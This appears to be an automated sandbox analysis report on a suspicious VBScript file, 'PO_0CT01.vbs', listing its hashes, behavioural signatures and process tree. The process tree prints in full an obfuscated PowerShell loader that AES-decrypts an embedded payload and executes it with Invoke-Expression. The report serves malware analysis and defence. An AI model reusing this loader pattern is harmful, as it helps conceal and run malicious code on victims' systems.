Analysis
max time kernel: 122s
max time network: 125s
platform: windows7_x64
resource: win7-20231020-en
resource tags: arch:x64, arch:x86, image:win7-20231020-en, locale:en-us, os:windows7-x64, system
submitted: 01-12-2023 06:40
Static task: static1
Behavioral task: behavioral1
  Sample: PO_0CT01.vbs
  Resource: win7-20231020-en (windows7-x64)
  3 signatures, 150 seconds
Behavioral task: behavioral2
  Sample: PO_0CT01.vbs
  Resource: win10v2004-20231127-en (windows10-2004-x64)
  13 signatures, 150 seconds
General
Target: PO_0CT01.vbs
Size: 159KB
MD5: dcef6132db05f9704623b495b05c1e4a
SHA1: ec64670ba9e10bf41fa634be3f8b7c5bec0f719b
SHA256: 18f41f2a39ff37e43e2a8e01b0447d613257682929e0d5383458935d8279773c
SHA512: 6c4eef2875783152687021060b390269e7de5756bcdf45f26880a83a8b65e99240483be5cf72caec6210c706060b53f03ebbf49a46685b4b747fa9c1e27b5b5d
SSDEEP: 1536:vSBSNS2SNSJSNSImSNSzSNSmSNS8SNSySNSaSNS1SP:v0YzYsYeYmYTY5YHYPYQg
Score: 1/10
Malware Config
Signatures
Suspicious behavior: EnumeratesProcesses (1 IoC)
  Process: powershell.exe (PID 1376)
Suspicious use of AdjustPrivilegeToken (1 IoC)
  Process: powershell.exe (PID 1376), Token: SeDebugPrivilege
Suspicious use of WriteProcessMemory (3 IoCs)
  PID 2540 (WScript.exe) wrote to memory of PID 1376 (powershell.exe), recorded 3 times
Processes
C:\Windows\System32\WScript.exe (PID 2540)
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\PO_0CT01.vbs"
  Signatures: Suspicious use of WriteProcessMemory
  Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1376)
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function Decrypt-AESEncryption{Param([String]$CBGNKODNPÇ,[String]$Keygfhfghfgiy)$OGjnLfnOaç = New-Object System.Security.Cryptography.AesManaged;$OGjnLfnOaç.Mode = [System.Security.Cryptography.CipherMode]::CBC;$OGjnLfnOaç.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$OGjnLfnOaç.BlockSize = 128;$OGjnLfnOaç.KeySize = 256;$OGjnLfnOaç.Key = (New-Object System.Security.Cryptography.SHA256Managed).ComputeHash([System.Text.Encoding]::UTF8.GetBytes($Keygfhfghfgiy));$BxwZvbgNLo = [System.Convert]::FromBase64String($CBGNKODNPÇ);$OGjnLfnOaç.IV = $BxwZvbgNLo[0..15];$decryptor = $OGjnLfnOaç.CreateDecryptor();$geLJgUoUQL = $decryptor.TransformFinalBlock($BxwZvbgNLo, 16, $BxwZvbgNLo.Length - 16);$OGjnLfnOaç.Dispose();return [System.Text.Encoding]::UTF8.GetString($geLJgUoUQL).Trim([char]0)}$qROuE = '23176310927586413792';$MqDDxKjJmA = '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';$GmtBWLkcKU = Decrypt-AESEncryption -CBGNKODNPÇ $MqDDxKjJmA -Key $qROuE;Invoke-Expression $GmtBWLkcKU
    Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken